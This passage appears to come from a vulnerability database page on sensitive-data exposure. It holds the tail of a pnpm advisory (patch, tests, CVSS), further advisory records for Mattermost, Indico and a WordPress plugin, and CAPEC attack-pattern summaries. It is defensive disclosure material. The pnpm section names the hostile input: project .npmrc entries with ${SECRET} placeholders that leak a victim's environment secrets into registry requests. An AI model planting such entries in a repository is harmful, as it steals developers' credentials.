patch\n\nScore after patch: 0.0\n\nRationale: exploitation is remote and low complexity once a victim runs pnpm or pacquet in the malicious repository. No attacker privileges are required, but user interaction is required. The demonstrated sink is secret disclosure through outbound registry requests, not arbitrary code execution, so confidentiality is high while integrity and availability are not directly impacted by this finding. After the patch, repository-controlled registry destinations and credential values containing env placeholders are ignored, while trusted user/global/auth.ini/CLI config still expands.\n\n## Weaknesses\n\nCWE-201: Insertion of Sensitive Information Into Sent Data\n\nCWE-200: Exposure of Sensitive Information to an Unauthorized Actor\n\nCWE-522: Insufficiently Protected Credentials\n\n## Patch\n\nThe patch makes environment expansion trust-aware for registry requests:\n\n- Project `.npmrc` no longer expands `${...}` in `registry`, `@scope:registry`, proxy URL values, URL-scoped keys such as `//host/${SECRET}/:_authToken`, or registry credential values such as `//host/:_authToken=${SECRET}` and `_authToken=${SECRET}`.\n- User `.npmrc`, auth.ini, CLI, global, and environment config still support env expansion for trusted registry configuration.\n- `pnpm-workspace.yaml` no longer expands `${...}` in `registry`, `registries`, or `namedRegistries` URL values.\n- Trusted user-level auth values such as `//registry.npmjs.org/:_authToken=${NODE_AUTH_TOKEN}` still expand or lossy-drop as before, preserving setup-node and OIDC trusted-publishing behavior when the `.npmrc` is supplied as user config.\n- Pacquet mirrors the same boundary with `from_project_ini()` for project `.npmrc` and workspace registry filtering.\n\nChanged files:\n\n- `config/reader/src/loadNpmrcFiles.ts`\n- `config/reader/src/getOptionsFromRootManifest.ts`\n- `config/reader/test/index.ts`\n- `config/reader/test/getOptionsFromRootManifest.test.ts`\n- `pacquet/crates/config/src/npmrc_auth.rs`\n- `pacquet/crates/config/src/npmrc_auth/tests.rs`\n- `pacquet/crates/config/src/workspace_yaml.rs`\n- `pacquet/crates/config/src/workspace_yaml/tests.rs`\n\nChangeset:\n\n- `.changeset/sharp-registry-env-placeholders.md`\n\nPacquet parity:\n\nPorted in the same patch. Pacquet dependency-management commands now parse project `.npmrc` with request-destination and credential-value env expansion disabled, and drop workspace registry values containing `${...}` placeholders.\n\n## Verification\n\nPost-patch validation:\n\nThe PoC ran:\n\n```bash\n./node_modules/.bin/tsgo --build config/reader/tsconfig.json\nNODE_OPTIONS=\"--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169\" ../../node_modules/.bin/jest test/getOptionsFromRootManifest.test.ts --runInBand\nNODE_OPTIONS=\"--experimental-vm-modules --disable-warning=ExperimentalWarning --disable-warning=DEP0169\" ../../node_modules/.bin/jest test/index.ts -t \"project \\.npmrc does not expand env variables in registry URLs|project \\.npmrc does not expand env variables in scoped registry URLs or URL-scoped keys|project \\.npmrc does not expand env variables in auth values|user \\.npmrc may expand env variables in registry URLs|drops the placeholder when the env var is unset|substitutes normally when the env var is set|only drops the unresolved placeholder|explicit .*undefined.* fallbacks|pnpm-workspace\\.yaml registries do not expand env variables|return a warning when the \\.npmrc has an env variable\" --runInBand\n./node_modules/.bin/eslint config/reader/src/loadNpmrcFiles.ts config/reader/src/getOptionsFromRootManifest.ts config/reader/test/index.ts config/reader/test/getOptionsFromRootManifest.test.ts\ncargo fmt --manifest-path pacquet/crates/config/Cargo.toml --check\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_scoped_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_url_scoped_keys --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml project_ini_ignores_env_placeholders_in_auth_values --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml trusted_ini_expands_env_placeholders_in_registry_urls --lib\ncargo test --manifest-path pacquet/crates/config/Cargo.toml ignores_env_vars_inside_workspace_registry_values --lib\ngit diff --check\n```\n\nResults:\n\n- PoC pre-patch model showed `cand122-ci-job-token` in both a request URL and a bearer auth header.\n- TypeScript build for `config.reader`: passed.\n- Focused root-manifest tests: 8 passed, including workspace registry and named-registry placeholder denial.\n- Focused config-reader integration tests: 10 passed, covering project `.npmrc` default registry denial, scoped registry denial, URL-scoped-key denial, project auth-value denial, trusted user `.npmrc` registry expansion, trusted user auth-value expansion/lossy fallback, and workspace registry denial.\n- `cargo fmt --check`: passed.\n- Focused pacquet tests: 6 passed, covering project `.npmrc` registry denial, scoped registry denial, URL-scoped-key denial, auth-value denial, trusted `.npmrc` registry expansion, and workspace YAML denial.\n- `git diff --check`: passed.\n\n## CVSS Reassessment\n\nThe initial scan score used a repository-code-execution vector:\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H` (8.8 High)\n\nThe PoC and source trace showed this finding is direct secret disclosure through registry request URLs or Authorization headers, not a code execution path. The corrected vulnerable vector is:\n\n`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N`\n\nCorrected vulnerable score: 7.4 High.\n\nFinal score after patch: 0.0.",
  "id": "GHSA-3qhv-2rgh-x77r",
  "modified": "2026-06-26T23:12:25Z",
  "published": "2026-06-26T23:12:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/pnpm/pnpm/security/advisories/GHSA-3qhv-2rgh-x77r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55180"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/pnpm/pnpm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "pnpm: Repository config can expand victim environment secrets into registry requests before scripts run"
}

GHSA-3RHR-JR63-HWQ5

Vulnerability from github – Published: 2026-03-16 15:30 – Updated: 2026-03-17 20:02
VLAI
Summary
Mattermost fails to preserve the redacted state of burn-on-read posts during deletion
Details

Mattermost versions 11.3.x <= 11.3.0 fail to preserve the redacted state of burn-on-read posts during deletion which allows channel members to access unrevealed burn-on-read message contents via the WebSocket post deletion event. Mattermost Advisory ID: MMSA-2026-00579

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost/server/v8"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.0.0-20260127062706-c6b205f0d770"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.3.2-0.20260127062706-c6b205f0d770"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.11.0-rc1"
            },
            {
              "fixed": "10.11.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.2.0-rc1"
            },
            {
              "fixed": "11.2.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/mattermost/mattermost-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "11.3.0-rc1"
            },
            {
              "fixed": "11.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-2578"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-201"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-17T20:02:36Z",
    "nvd_published_at": "2026-03-16T14:19:30Z",
    "severity": "MODERATE"
  },
  "details": "Mattermost versions 11.3.x \u003c= 11.3.0 fail to preserve the redacted state of burn-on-read posts during deletion which allows channel members to access unrevealed burn-on-read message contents via the WebSocket post deletion event. Mattermost Advisory ID: MMSA-2026-00579",
  "id": "GHSA-3rhr-jr63-hwq5",
  "modified": "2026-03-17T20:02:36Z",
  "published": "2026-03-16T15:30:43Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2578"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mattermost/mattermost/commit/c6b205f0d77080ef805783de0628b9526af7faec"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/mattermost/mattermost"
    },
    {
      "type": "WEB",
      "url": "https://mattermost.com/security-updates"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mattermost fails to preserve the redacted state of burn-on-read posts during deletion"
}

GHSA-3WG7-R7Q5-R2JF

Vulnerability from github – Published: 2025-01-16 18:31 – Updated: 2025-01-21 17:12
VLAI
Summary
Indico Insecure Access
Details

A Broken Object Level Authorization (BOLA) vulnerability in Indico v3.2.9 allows attackers to access sensitive information via sending a crafted POST request to the component /api/principals.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "indico"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.2.9"
            },
            {
              "fixed": "3.3.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-50633"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-201",
      "CWE-639",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-01-16T20:09:49Z",
    "nvd_published_at": "2025-01-16T18:15:24Z",
    "severity": "MODERATE"
  },
  "details": "A Broken Object Level Authorization (BOLA) vulnerability in Indico v3.2.9 allows attackers to access sensitive information via sending a crafted POST request to the component /api/principals.",
  "id": "GHSA-3wg7-r7q5-r2jf",
  "modified": "2025-01-21T17:12:43Z",
  "published": "2025-01-16T18:31:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50633"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cetinpy/CVE-2024-50633/issues/1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cetinpy/CVE-2024-50633"
    },
    {
      "type": "WEB",
      "url": "https://github.com/indico/indico"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Indico Insecure Access"
}

GHSA-3WH6-J4G5-PQ88

Vulnerability from github – Published: 2025-01-24 18:31 – Updated: 2026-04-01 18:33
VLAI
Details

Insertion of Sensitive Information Into Sent Data vulnerability in Code for Recovery 12 Step Meeting List allows Retrieve Embedded Sensitive Data. This issue affects 12 Step Meeting List: from n/a through 3.16.5.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-24582"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-201"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-24T18:15:35Z",
    "severity": "MODERATE"
  },
  "details": "Insertion of Sensitive Information Into Sent Data vulnerability in Code for Recovery 12 Step Meeting List allows Retrieve Embedded Sensitive Data. This issue affects 12 Step Meeting List: from n/a through 3.16.5.",
  "id": "GHSA-3wh6-j4g5-pq88",
  "modified": "2026-04-01T18:33:24Z",
  "published": "2025-01-24T18:31:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24582"
    },
    {
      "type": "WEB",
      "url": "https://patchstack.com/database/wordpress/plugin/12-step-meeting-list/vulnerability/wordpress-12-step-meeting-list-plugin-3-16-5-sensitive-data-exposure-vulnerability?_s_id=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Requirements

Specify which data in the software should be regarded as sensitive. Consider which types of users should have access to which types of data.

Mitigation
Implementation

Ensure that any possibly sensitive data specified in the requirements is verified with designers to ensure that it is either a calculated risk or mitigated elsewhere. Any information that is not necessary to the functionality should be removed in order to lower both the overhead and the possibility of security sensitive data being sent.

Mitigation
System Configuration

Setup default error messages so that unexpected errors do not disclose sensitive information.

Mitigation MIT-46
Architecture and Design

Strategy: Separation of Privilege

  • Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
  • Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
CAPEC-12: Choosing Message Identifier

This pattern of attack is defined by the selection of messages distributed via multicast or public information channels that are intended for another client by determining the parameter value assigned to that client. This attack allows the adversary to gain access to potentially privileged information, and to possibly perpetrate other attacks through the distribution means by impersonation. If the channel/message being manipulated is an input rather than output mechanism for the system, (such as a command bus), this style of attack could be used to change the adversary's identifier to more a privileged one.

CAPEC-217: Exploiting Incorrectly Configured SSL/TLS

An adversary takes advantage of incorrectly configured SSL/TLS communications that enables access to data intended to be encrypted. The adversary may also use this type of attack to inject commands or other traffic into the encrypted stream to cause compromise of either the client or server.

CAPEC-612: WiFi MAC Address Tracking

In this attack scenario, the attacker passively listens for WiFi messages and logs the associated Media Access Control (MAC) addresses. These addresses are intended to be unique to each wireless device (although they can be configured and changed by software). Once the attacker is able to associate a MAC address with a particular user or set of users (for example, when attending a public event), the attacker can then scan for that MAC address to track that user in the future.

CAPEC-613: WiFi SSID Tracking

In this attack scenario, the attacker passively listens for WiFi management frame messages containing the Service Set Identifier (SSID) for the WiFi network. These messages are frequently transmitted by WiFi access points (e.g., the retransmission device) as well as by clients that are accessing the network (e.g., the handset/mobile device). Once the attacker is able to associate an SSID with a particular user or set of users (for example, when attending a public event), the attacker can then scan for this SSID to track that user in the future.

CAPEC-618: Cellular Broadcast Message Request

In this attack scenario, the attacker uses knowledge of the target’s mobile phone number (i.e., the number associated with the SIM used in the retransmission device) to cause the cellular network to send broadcast messages to alert the mobile device. Since the network knows which cell tower the target’s mobile device is attached to, the broadcast messages are only sent in the Location Area Code (LAC) where the target is currently located. By triggering the cellular broadcast message and then listening for the presence or absence of that message, an attacker could verify that the target is in (or not in) a given location.

CAPEC-619: Signal Strength Tracking

In this attack scenario, the attacker passively monitors the signal strength of the target’s cellular RF signal or WiFi RF signal and uses the strength of the signal (with directional antennas and/or from multiple listening points at once) to identify the source location of the signal. Obtaining the signal of the target can be accomplished through multiple techniques such as through Cellular Broadcast Message Request or through the use of IMSI Tracking or WiFi MAC Address Tracking.

CAPEC-621: Analysis of Packet Timing and Sizes

An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).

CAPEC-622: Electromagnetic Side-Channel Attack

In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.

CAPEC-623: Compromising Emanations Attack

Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. Capturing these emissions can help an adversary understand what the device is doing.